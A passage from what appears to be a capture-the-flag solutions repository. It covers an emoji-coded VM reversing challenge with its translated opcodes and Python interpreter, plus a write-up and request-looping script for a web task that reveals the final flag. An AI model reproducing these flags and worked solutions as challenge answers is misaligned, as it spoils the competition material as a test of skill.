4️⃣ 4️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇 11 | 🚛 🥇 1️⃣ 3️⃣ 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇 12 | 🚛 🥇 1️⃣ 3️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇 13 | 🚛 🥇 1️⃣ 3️⃣ 4️⃣ 3️⃣ 7️⃣ ✋ 📥 🥇 14 | 🚛 🥇 1️⃣ 2️⃣ 8️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇 15 | 🚛 🥇 1️⃣ 2️⃣ 7️⃣ 4️⃣ 1️⃣ ✋ 📥 🥇 16 | 🚛 🥇 1️⃣ 2️⃣ 5️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇 17 | 🚛 🥇 1️⃣ 1️⃣ 5️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇 18 | 🚛 🥇 1️⃣ 1️⃣ 3️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇 19 | 🚛 🥇 1️⃣ 0️⃣ 5️⃣ 0️⃣ 3️⃣ ✋ 📥 🥇 20 | 🚛 🥇 1️⃣ 0️⃣ 5️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇 21 | 🚛 🥇 1️⃣ 0️⃣ 3️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇 22 | 🚛 🥇 9️⃣ 7️⃣ 5️⃣ ✋ 📥 🥇 23 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ ✋ 📥 🥇 24 | 🚛 🥇 8️⃣ 9️⃣ 2️⃣ ✋ 📥 🥇 25 | 🚛 🥇 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇 26 | 🚛 🥇 6️⃣ 6️⃣ 0️⃣ ✋ 📥 🥇 27 | 🚛 🥇 7️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇 28 | 🚛 🥇 2️⃣ 6️⃣ 7️⃣ ✋ 📥 🥇 29 | 🚛 🥇 3️⃣ 4️⃣ 4️⃣ ✋ 📥 🥇 30 | 🚛 🥇 2️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇 31 | 🚛 🥇 3️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇 32 | 🚛 🥇 2️⃣ 0️⃣ 8️⃣ ✋ 📥 🥇 33 | 🚛 🥇 2️⃣ 1️⃣ 6️⃣ ✋ 📥 🥇 34 | 🚛 🥇 2️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇 35 | 🚛 🥇 1️⃣ 7️⃣ 2️⃣ ✋ 📥 🥇 36 | 🚛 🥇 7️⃣ 4️⃣ ✋ 📥 🥇 37 | 🚛 🥇 4️⃣ 9️⃣ ✋ 📥 🥇 38 | 🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇 39 | 🚛 🥇 1️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇 40 | 🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇 41 | 🚛 🥇 1️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇 42 | 🚛 🥈 1️⃣ ✋ 43 | 44 | 🖋💠🔶🎌🚩🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 3️⃣ 8️⃣ 9️⃣ ✋ 45 | 📥 🥇 📥 🥈 46 | 🏀 💰🏁🚩🎌💠🔶 47 | 🌓 🎤 48 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈 49 | 😄 🏀 💰💠🔶🎌🚩🏁 😐 50 | 51 | 🚛 🥇 9️⃣ 8️⃣ 4️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇 52 | 🚛 🥇 9️⃣ 7️⃣ 8️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇 53 | 🚛 🥇 9️⃣ 7️⃣ 6️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇 54 | 🚛 🥇 9️⃣ 7️⃣ 2️⃣ 8️⃣ 0️⃣ ✋ 📥 🥇 55 | 🚛 🥇 9️⃣ 6️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇 56 | 🚛 🥇 9️⃣ 6️⃣ 4️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇 57 | 🚛 🥇 9️⃣ 6️⃣ 3️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇 58 | 🚛 🥇 9️⃣ 5️⃣ 9️⃣ 3️⃣ 4️⃣ ✋ 📥 🥇 59 | 🚛 🥇 9️⃣ 4️⃣ 8️⃣ 6️⃣ 5️⃣ ✋ 📥 🥇 60 | 🚛 🥇 9️⃣ 4️⃣ 9️⃣ 5️⃣ 2️⃣ ✋ 📥 🥇 61 | 🚛 🥇 9️⃣ 4️⃣ 6️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇 62 | 🚛 🥇 9️⃣ 4️⃣ 4️⃣ 4️⃣ 0️⃣ ✋ 📥 🥇 63 | 🚛 🥇 9️⃣ 3️⃣ 9️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇 64 | 🚛 🥇 9️⃣ 3️⃣ 7️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇 65 | 🚛 🥈 9️⃣ 9️⃣ ✋ 66 | 67 | 🖋💠🏁🎌🔶🚩 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 5️⃣ 6️⃣ 8️⃣ ✋ 68 | 📥 🥇 📥 🥈 69 | 🏀 💰🏁🚩🎌💠🔶 70 | 🌓 🎤 71 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈 72 | 😄 🏀 💰💠🏁🎌🔶🚩 😐 73 | 74 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇 75 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 6️⃣ 0️⃣ 2️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇 76 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 5️⃣ 5️⃣ ✋ 📥 🥇 77 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 9️⃣ 9️⃣ 8️⃣ 9️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇 78 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 8️⃣ 8️⃣ 7️⃣ 9️⃣ 9️⃣ 0️⃣ ✋ 📥 🥇 79 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 6️⃣ 7️⃣ 0️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇 80 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 0️⃣ 7️⃣ 0️⃣ 3️⃣ 6️⃣ ✋ 📥 🥇 81 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 6️⃣ 5️⃣ 6️⃣ 1️⃣ 1️⃣ 1️⃣ ✋ 📥 🥇 82 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 4️⃣ 0️⃣ 4️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇 83 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 6️⃣ 0️⃣ 9️⃣ 2️⃣ 2️⃣ ✋ 📥 🥇 84 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 3️⃣ 1️⃣ 0️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇 85 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 1️⃣ 1️⃣ 1️⃣ 0️⃣ 0️⃣ ✋ 📥 🥇 86 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 5️⃣ 9️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇 87 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 4️⃣ 9️⃣ 9️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇 88 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 4️⃣ 5️⃣ ✋ 📥 🥇 89 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 9️⃣ 9️⃣ 9️⃣ 7️⃣ ✋ 📥 🥇 90 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 1️⃣ 8️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇 91 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 0️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇 92 | 🚛 🥇 9️⃣ 9️⃣ 7️⃣ 8️⃣ 8️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇 93 | 🚛 🥇 9️⃣ 9️⃣ 6️⃣ 5️⃣ 7️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇 94 | 🚛 🥇 9️⃣ 9️⃣ 5️⃣ 7️⃣ 5️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇 95 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 8️⃣ 3️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇 96 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 5️⃣ 4️⃣ 2️⃣ 7️⃣ ✋ 📥 🥇 97 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 2️⃣ 2️⃣ 8️⃣ 9️⃣ ✋ 📥 🥇 98 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 1️⃣ 4️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇 99 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 7️⃣ 3️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇 100 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 6️⃣ 3️⃣ 7️⃣ 6️⃣ ✋ 📥 🥇 101 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 3️⃣ 2️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇 102 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 1️⃣ 3️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇 103 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 9️⃣ 1️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇 104 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 8️⃣ 0️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇 105 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 6️⃣ 2️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇 106 | 🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋ 107 | 108 | 🖋🚩💠🎌🔶🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 1️⃣ 0️⃣ 2️⃣ 3️⃣ ✋ 109 | 📥 🥇 📥 🥈 110 | 🏀 💰🏁🚩🎌💠🔶 111 | 🌓 🎤 112 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈 113 | 😄 🏀 💰🚩💠🎌🔶🏁 😐 114 | ⌛ 115 | 116 | 🖋🏁🚩🎌💠🔶 117 | 🚛 🥇 2️⃣ ✋ 📥 🥇 🖋💠🎌🏁🚩🔶 118 | 🏀 💰🚩🔶🏁🎌💠 119 | 🖋🔶🎌🚩💠🏁 😲 📤 🏀 💰🔶🚩💠🏁🎌 ✋ 😐 120 | 📤 🏀 💰🎌🏁💠🔶🚩 121 | 🖋🎌🏁🚩🔶💠 😲 📤 🏀 💰🔶🚩💠🏁🎌 😐 122 | 📤 🍿 🥇 🚛 🥈 1️⃣ ✋ 📥 🥈 🔪 123 | 😲 📤 🍿 🥈 📥 🥇 📥 🥈 ⛰ 😐 📥 🥇 124 | 🖋🔶🚩💠🏁🎌 🚛 🥈 1️⃣ ✋ 📥 🥈 🍡 🏀 💰💠🎌🏁🚩🔶 125 | 126 | 🖋🚩🔶🏁🎌💠 127 | 🤡 🚛 🥇 2️⃣ ✋ 📥 🥇 128 | 🖋🎌🚩💠🔶🏁 🔪 😲 📤 🚛 🥇 1️⃣ ✋ 📥 🥇 129 | 🏀 💰🔶🎌🚩💠🏁 😐 130 | 📤 🤡 📥 🥇 131 | 📬 😲 🏀 💰🔶🎌🚩💠🏁 😐 132 | 📤 🤡 📥 🥇 🚛 🥇 1️⃣ ✋ 133 | 📥 🥇 🍡 🤡 🍿 🥇 🏀 💰🎌🚩💠🔶🏁 134 | 135 | 🖋🎌🏁💠🔶🚩 136 | 🤡 🤡 🚛 🥈 0️⃣ ✋ 📥 🥈 137 | 🖋🏁💠🔶🚩🎌 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇 138 | ⭐ 🍿 🥈 📥 🥇 📬 139 | 📥 🥈 🍡 🍿 🥈 🍿 🥇 🤡 📥 🥈 🔪 140 | 😲 📤 🚛 🥈 1️⃣ ✋ 📥 🥈 🏀 💰🎌🏁🚩🔶💠 😐 141 | 📤 📥 🥇 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇 📐 142 | 😲 🏀 💰🎌🏁🚩🔶💠 😐 143 | 🤡 📥 🥈 🏀 💰🏁💠🔶🚩🎌 144 | -------------------------------------------------------------------------------- /07-reversing-emoji/translated: -------------------------------------------------------------------------------- 1 | push 0 2 | push 17488 3 | push 16758 4 | push 16599 5 | push 16285 6 | push 16094 7 | push 15505 8 | push 15417 9 | push 14832 10 | push 14450 11 | push 13893 12 | push 13926 13 | push 13437 14 | push 12833 15 | push 12741 16 | push 12533 17 | push 11504 18 | push 11342 19 | push 10503 20 | push 10550 21 | push 10319 22 | push 975 23 | push 1007 24 | push 892 25 | push 893 26 | push 660 27 | push 743 28 | push 267 29 | push 344 30 | push 264 31 | push 339 32 | push 208 33 | push 216 34 | push 242 35 | push 172 36 | push 74 37 | push 49 38 | push 119 39 | push 113 40 | push 119 41 | push 106 42 | pop acc1 43 | push 1 44 | push 106 45 | push 389 46 | push 1 47 | jump_to 48 | xor 49 | print_top 50 | push 1 51 | add 52 | pop acc2 53 | if_not_zero 54 | jump_to 55 | push 98426 56 | push 97850 57 | push 97604 58 | push 97280 59 | push 96815 60 | push 96443 61 | push 96354 62 | push 95934 63 | push 94865 64 | push 94952 65 | push 94669 66 | push 94440 67 | push 93969 68 | push 93766 69 | pop acc1 70 | push 99 71 | push 93766 72 | push 568 73 | push 99 74 | jump_to 75 | xor 76 | print_top 77 | push 1 78 | add 79 | pop acc2 80 | if_not_zero 81 | jump_to 82 | push 101141058 83 | push 101060206 84 | push 101030055 85 | push 100998966 86 | push 100887990 87 | push 100767085 88 | push 100707036 89 | push 100656111 90 | push 100404094 91 | push 100160922 92 | push 100131019 93 | push 100111100 94 | push 100059926 95 | push 100049982 96 | push 100030045 97 | push 9989997 98 | push 9981858 99 | push 9980815 100 | push 9978842 101 | push 9965794 102 | push 9957564 103 | push 9938304 104 | push 9935427 105 | push 9932289 106 | push 9931494 107 | push 9927388 108 | push 9926376 109 | push 9923213 110 | push 9921394 111 | push 9919154 112 | push 9918082 113 | push 9916239 114 | pop acc1 115 | push 765 116 | push 9916239 117 | push 1023 118 | push 765 119 | jump_to 120 | xor 121 | print_top 122 | push 1 123 | add 124 | pop acc2 125 | if_not_zero 126 | jump_to 127 | exit 128 | push 2 129 | jump_to 130 | if_zero 131 | pop_out 132 | jump_to 133 | pop_out 134 | jump_to 135 | if_zero 136 | pop_out 137 | jump_to 138 | pop_out 139 | pop acc1 140 | push 1 141 | sub 142 | if_zero 143 | pop_out 144 | pop acc2 145 | push 2 146 | push 1 147 | jump_top 148 | push 2 149 | push 1 150 | add 151 | jump_to 152 | clone 153 | push 2 154 | sub 155 | if_zero 156 | pop_out 157 | push 1 158 | jump_to 159 | pop_out 160 | clone 161 | push 1 162 | modulo 163 | if_zero 164 | jump_to 165 | pop_out 166 | clone 167 | push 1 168 | push 1 169 | add 170 | clone 171 | pop acc1 172 | jump_to 173 | clone 174 | clone 175 | push 0 176 | push 10 177 | multiply 178 | pop acc2 179 | push 10 180 | modulo 181 | push 10 182 | add 183 | pop acc2 184 | pop acc1 185 | clone 186 | push 10 187 | sub 188 | if_zero 189 | pop_out 190 | push 1 191 | jump_to 192 | pop_out 193 | push 10 194 | push 10 195 | divide 196 | if_zero 197 | jump_to 198 | clone 199 | push 1 200 | jump_to 201 | -------------------------------------------------------------------------------- /07-reversing-emoji/vm.modified.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # Implements a simple stack-based VM 4 | class VM: 5 | 6 | def __init__(self, rom): 7 | self.rom = rom 8 | self.accumulator1 = 0 9 | self.accumulator2 = 0 10 | self.instruction_pointer = 1 11 | self.stack = [] 12 | 13 | def step(self): 14 | cur_ins = self.rom[self.instruction_pointer] 15 | self.instruction_pointer += 1 16 | 17 | fn = VM.OPERATIONS.get(cur_ins, None) 18 | 19 | if cur_ins[0] == '🖋': 20 | return 21 | if fn is None: 22 | raise RuntimeError("Unknown instruction '{}' at {}".format( 23 | repr(cur_ins), self.instruction_pointer - 1)) 24 | else: 25 | fn(self) 26 | 27 | def add(self): 28 | self.stack.append(self.stack.pop() + self.stack.pop()) 29 | 30 | def sub(self): 31 | a = self.stack.pop() 32 | b = self.stack.pop() 33 | self.stack.append(b - a) 34 | 35 | def if_zero(self): 36 | if self.stack[-1] == 0: 37 | while self.rom[self.instruction_pointer] != '😐': 38 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']: 39 | break 40 | self.step() 41 | else: 42 | self.find_first_endif() 43 | self.instruction_pointer += 1 44 | 45 | def if_not_zero(self): 46 | if self.stack[-1] != 0: 47 | while self.rom[self.instruction_pointer] != '😐': 48 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']: 49 | break 50 | self.step() 51 | else: 52 | self.find_first_endif() 53 | self.instruction_pointer += 1 54 | 55 | def find_first_endif(self): 56 | while self.rom[self.instruction_pointer] != '😐': 57 | self.instruction_pointer += 1 58 | 59 | def jump_to(self): 60 | marker = self.rom[self.instruction_pointer] 61 | if marker[0] != '💰': 62 | print('Incorrect symbol : ' + marker[0]) 63 | raise SystemExit() 64 | marker = '🖋' + marker[1:] 65 | self.instruction_pointer = self.rom.index(marker) + 1 66 | 67 | def jump_top(self): 68 | self.instruction_pointer = self.stack.pop() 69 | 70 | def exit(self): 71 | print('\nDone.') 72 | raise SystemExit() 73 | 74 | def print_top(self): 75 | sys.stdout.write(chr(self.stack.pop())) 76 | sys.stdout.flush() 77 | 78 | def push(self): 79 | if self.rom[self.instruction_pointer] == '🥇': 80 | self.stack.append(self.accumulator1) 81 | elif self.rom[self.instruction_pointer] == '🥈': 82 | self.stack.append(self.accumulator2) 83 | else: 84 | raise RuntimeError('Unknown instruction {} at position {}'.format( 85 | self.rom[self.instruction_pointer], str(self.instruction_pointer))) 86 | self.instruction_pointer += 1 87 | 88 | def pop(self): 89 | if self.rom[self.instruction_pointer] == '🥇': 90 | self.accumulator1 = self.stack.pop() 91 | elif self.rom[self.instruction_pointer] == '🥈': 92 | self.accumulator2 = self.stack.pop() 93 | else: 94 | raise RuntimeError('Unknown instruction {} at position {}'.format( 95 | self.rom[self.instruction_pointer], str(self.instruction_pointer))) 96 | self.instruction_pointer += 1 97 | 98 | def pop_out(self): 99 | self.stack.pop() 100 | 101 | def load(self): 102 | num = 0 103 | 104 | if self.rom[self.instruction_pointer] == '🥇': 105 | acc = 1 106 | elif self.rom[self.instruction_pointer] == '🥈': 107 | acc = 2 108 | else: 109 | raise RuntimeError('Unknown instruction {} at position {}'.format( 110 | self.rom[self.instruction_pointer], str(self.instruction_pointer))) 111 | self.instruction_pointer += 1 112 | 113 | while self.rom[self.instruction_pointer] != '✋': 114 | num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0')) 115 | self.instruction_pointer += 1 116 | 117 | if acc == 1: 118 | self.accumulator1 = num 119 | else: 120 | self.accumulator2 = num 121 | 122 | self.instruction_pointer += 1 123 | 124 | def clone(self): 125 | self.stack.append(self.stack[-1]) 126 | 127 | def multiply(self): 128 | a = self.stack.pop() 129 | b = self.stack.pop() 130 | self.stack.append(b * a) 131 | 132 | def divide(self): 133 | a = self.stack.pop() 134 | b = self.stack.pop() 135 | self.stack.append(b // a) 136 | 137 | def modulo(self): 138 | a = self.stack.pop() 139 | b = self.stack.pop() 140 | self.stack.append(b % a) 141 | 142 | def xor(self): 143 | a = self.stack.pop() 144 | b = self.stack.pop() 145 | print("{} ^ {}\n".format(b, a)) 146 | self.stack.append(b ^ a) 147 | 148 | OPERATIONS = { 149 | '🍡': add, 150 | '🤡': clone, 151 | '📐': divide, 152 | '😲': if_zero, 153 | '😄': if_not_zero, 154 | '🏀': jump_to, 155 | '🚛': load, 156 | '📬': modulo, 157 | '⭐': multiply, 158 | '🍿': pop, 159 | '📤': pop_out, 160 | '🎤': print_top, 161 | '📥': push, 162 | '🔪': sub, 163 | '🌓': xor, 164 | '⛰': jump_top, 165 | '⌛': exit 166 | } 167 | 168 | 169 | if __name__ == '__main__': 170 | if len(sys.argv) != 2: 171 | print('Missing program') 172 | raise SystemExit() 173 | 174 | with open(sys.argv[1], 'r') as f: 175 | print('Running ....') 176 | all_ins = [''] 177 | all_ins.extend(f.read().split()) 178 | vm = VM(all_ins) 179 | 180 | while 1: 181 | vm.step() 182 | -------------------------------------------------------------------------------- /07-reversing-emoji/vm.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # Implements a simple stack-based VM 4 | class VM: 5 | 6 | def __init__(self, rom): 7 | self.rom = rom 8 | self.accumulator1 = 0 9 | self.accumulator2 = 0 10 | self.instruction_pointer = 1 11 | self.stack = [] 12 | 13 | def step(self): 14 | cur_ins = self.rom[self.instruction_pointer] 15 | self.instruction_pointer += 1 16 | 17 | fn = VM.OPERATIONS.get(cur_ins, None) 18 | 19 | if cur_ins[0] == '🖋': 20 | return 21 | if fn is None: 22 | raise RuntimeError("Unknown instruction '{}' at {}".format( 23 | repr(cur_ins), self.instruction_pointer - 1)) 24 | else: 25 | fn(self) 26 | 27 | def add(self): 28 | self.stack.append(self.stack.pop() + self.stack.pop()) 29 | 30 | def sub(self): 31 | a = self.stack.pop() 32 | b = self.stack.pop() 33 | self.stack.append(b - a) 34 | 35 | def if_zero(self): 36 | if self.stack[-1] == 0: 37 | while self.rom[self.instruction_pointer] != '😐': 38 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']: 39 | break 40 | self.step() 41 | else: 42 | self.find_first_endif() 43 | self.instruction_pointer += 1 44 | 45 | def if_not_zero(self): 46 | if self.stack[-1] != 0: 47 | while self.rom[self.instruction_pointer] != '😐': 48 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']: 49 | break 50 | self.step() 51 | else: 52 | self.find_first_endif() 53 | self.instruction_pointer += 1 54 | 55 | def find_first_endif(self): 56 | while self.rom[self.instruction_pointer] != '😐': 57 | self.instruction_pointer += 1 58 | 59 | def jump_to(self): 60 | marker = self.rom[self.instruction_pointer] 61 | if marker[0] != '💰': 62 | print('Incorrect symbol : ' + marker[0]) 63 | raise SystemExit() 64 | marker = '🖋' + marker[1:] 65 | self.instruction_pointer = self.rom.index(marker) + 1 66 | 67 | def jump_top(self): 68 | self.instruction_pointer = self.stack.pop() 69 | 70 | def exit(self): 71 | print('\nDone.') 72 | raise SystemExit() 73 | 74 | def print_top(self): 75 | sys.stdout.write(chr(self.stack.pop())) 76 | sys.stdout.flush() 77 | 78 | def push(self): 79 | if self.rom[self.instruction_pointer] == '🥇': 80 | self.stack.append(self.accumulator1) 81 | elif self.rom[self.instruction_pointer] == '🥈': 82 | self.stack.append(self.accumulator2) 83 | else: 84 | raise RuntimeError('Unknown instruction {} at position {}'.format( 85 | self.rom[self.instruction_pointer], str(self.instruction_pointer))) 86 | self.instruction_pointer += 1 87 | 88 | def pop(self): 89 | if self.rom[self.instruction_pointer] == '🥇': 90 | self.accumulator1 = self.stack.pop() 91 | elif self.rom[self.instruction_pointer] == '🥈': 92 | self.accumulator2 = self.stack.pop() 93 | else: 94 | raise RuntimeError('Unknown instruction {} at position {}'.format( 95 | self.rom[self.instruction_pointer], str(self.instruction_pointer))) 96 | self.instruction_pointer += 1 97 | 98 | def pop_out(self): 99 | self.stack.pop() 100 | 101 | def load(self): 102 | num = 0 103 | 104 | if self.rom[self.instruction_pointer] == '🥇': 105 | acc = 1 106 | elif self.rom[self.instruction_pointer] == '🥈': 107 | acc = 2 108 | else: 109 | raise RuntimeError('Unknown instruction {} at position {}'.format( 110 | self.rom[self.instruction_pointer], str(self.instruction_pointer))) 111 | self.instruction_pointer += 1 112 | 113 | while self.rom[self.instruction_pointer] != '✋': 114 | num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0')) 115 | self.instruction_pointer += 1 116 | 117 | if acc == 1: 118 | self.accumulator1 = num 119 | else: 120 | self.accumulator2 = num 121 | 122 | self.instruction_pointer += 1 123 | 124 | def clone(self): 125 | self.stack.append(self.stack[-1]) 126 | 127 | def multiply(self): 128 | a = self.stack.pop() 129 | b = self.stack.pop() 130 | self.stack.append(b * a) 131 | 132 | def divide(self): 133 | a = self.stack.pop() 134 | b = self.stack.pop() 135 | self.stack.append(b // a) 136 | 137 | def modulo(self): 138 | a = self.stack.pop() 139 | b = self.stack.pop() 140 | self.stack.append(b % a) 141 | 142 | def xor(self): 143 | a = self.stack.pop() 144 | b = self.stack.pop() 145 | self.stack.append(b ^ a) 146 | 147 | OPERATIONS = { 148 | '🍡': add, 149 | '🤡': clone, 150 | '📐': divide, 151 | '😲': if_zero, 152 | '😄': if_not_zero, 153 | '🏀': jump_to, 154 | '🚛': load, 155 | '📬': modulo, 156 | '⭐': multiply, 157 | '🍿': pop, 158 | '📤': pop_out, 159 | '🎤': print_top, 160 | '📥': push, 161 | '🔪': sub, 162 | '🌓': xor, 163 | '⛰': jump_top, 164 | '⌛': exit 165 | } 166 | 167 | 168 | if __name__ == '__main__': 169 | if len(sys.argv) != 2: 170 | print('Missing program') 171 | raise SystemExit() 172 | 173 | with open(sys.argv[1], 'r') as f: 174 | print('Running ....') 175 | all_ins = [''] 176 | all_ins.extend(f.read().split()) 177 | vm = VM(all_ins) 178 | 179 | while 1: 180 | vm.step() 181 | -------------------------------------------------------------------------------- /08-misc-drive-to-target/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## Drive to the target 3 | Label: coding 4 | 5 | Excellent work! With your fine sleuthing skills, you managed to find a picture of the handsome creature with its pet biped. At last friends and companionship may be near! 6 | 7 | Like all inhabitants of this world, you spend an inordinate amount of time on the site, stalking and comparing your life to that of others. The first thought that springs to your mind is "Why haven't I ever been to Mauritius on holiday?" followed swiftly by "What is a Mauritius anyway?" But after a while and with language successfully deciphered, you've made contact with the lifeform in the picture, you have a "date"? You're given the address of where to meet your potential interest. "1 Banana way, beware of the glass." An odd address, especially that last part. So how do you get there? You land your ship and begin to search. 8 | 9 | # Solution 10 | This task is a link to the site `https://drivetothetarget.web.ctfcompetition.com`. The site contains two inputs for lattitude and longitude. Choosing values will tell you your speed and text if you are getting closer or further. It seems that the goal is to find the correct location but you can only move a bit at a time. Playing with the numbers, decrementing lat and lon gives us the message that we are getting closer. Some other important facts: When the message says that you traveled too fast, if you retry the same value, eventually it will work. Next, a new token is given in a hiden input field. With these facts, we can write a script that continuously decrements the lat and lon, and retries if it fails. It also appears that the token identifies your location which is how it calculates the distance you can travel. 11 | 12 | The script `drive.py` continuously decrements `lon` until the message says that we are moving away. Then it switches to decrementing `lat`. Something important that I didn't add is a check for the text `CTF` in case we find it as I was monitoring it mostly. I found the the default of `0.0001` increment worked well. This is marked as a 'coding' task but i'm not sure if just spamming a ton of calls is the right way to approach this. Maybe there is a way to calculate the token. It would also be better optimized if both lat an lon were decremented but I didn't know if that would work in case you had to decrement one more than the other. 13 | 14 | At `{'lat': '51.4921', 'lon': '-0.1929', 'token': 'gAAAAABdEwWoQWGTXd5P1nB6paz9PWM-LbxNr_bfmaAC5qVJZXwanyHyGPUHqFZIj9hj3I3Q1mqG3jpWEIgLO3z7C_tu7MsEDb33TL3FFyUtM0gxFmFMc-Xs6K8h57Wu-yl5IB-ZNJgY'}`, the script got stuck in a loop printing out `If you want to meet your friends, you should move.` because I forgot the exit condition. So at that point I just manually adjusted the values. And the final values are 15 | `{'lat': '51.4921', 'lon': '-0.1929'}` with the flag `CTF{Who_is_Tardis_Ormandy}`. In all, it took quite a long time to run. -------------------------------------------------------------------------------- /08-misc-drive-to-target/drive.py: -------------------------------------------------------------------------------- 1 | # requires requests and requests-html 2 | 3 | from requests_html import HTMLSession 4 | from urllib.parse import urlparse, parse_qs 5 | import time 6 | 7 | lat = 51.5710 8 | lon = -0.1925 9 | token = 'gAAAAABdEwKRoX1YphdiX0kwxKSsY6CmxjNt-R5hkwf4-Ohktb7oyZJRkrX-LK5j12wuj_jgSNjY9wG53zrifwIe1OMk23uTX7LJaYzB7gWRPFUBXYqePYLekg4Z2RgMt3HE0ehzP50Y' 10 | url = 'https://drivetothetarget.web.ctfcompetition.com' 11 | inc = 0.0001 12 | is_lat = False 13 | 14 | session = HTMLSession() 15 | while True: 16 | qlat = lat - inc if is_lat else lat 17 | qlon = lon - inc if not is_lat else lon 18 | query = {'lat': "{0:.4f}".format(qlat), 'lon': "{0:.4f}".format(qlon), 'token': token} 19 | r = session.get(url, params=query) 20 | response_url = urlparse(r.url) 21 | response_query = parse_qs(response_url.query) 22 | 23 | token = r.html.find('input')[2].attrs['value'] 24 | 25 | print(query) 26 | 27 | try: 28 | response_text = r.html.find('p')[1].text 29 | print(response_text) 30 | 31 | if response_text.startswith('You tried to travel') or response_text.startswith('Woa, were about to move'): 32 | # retry last values 33 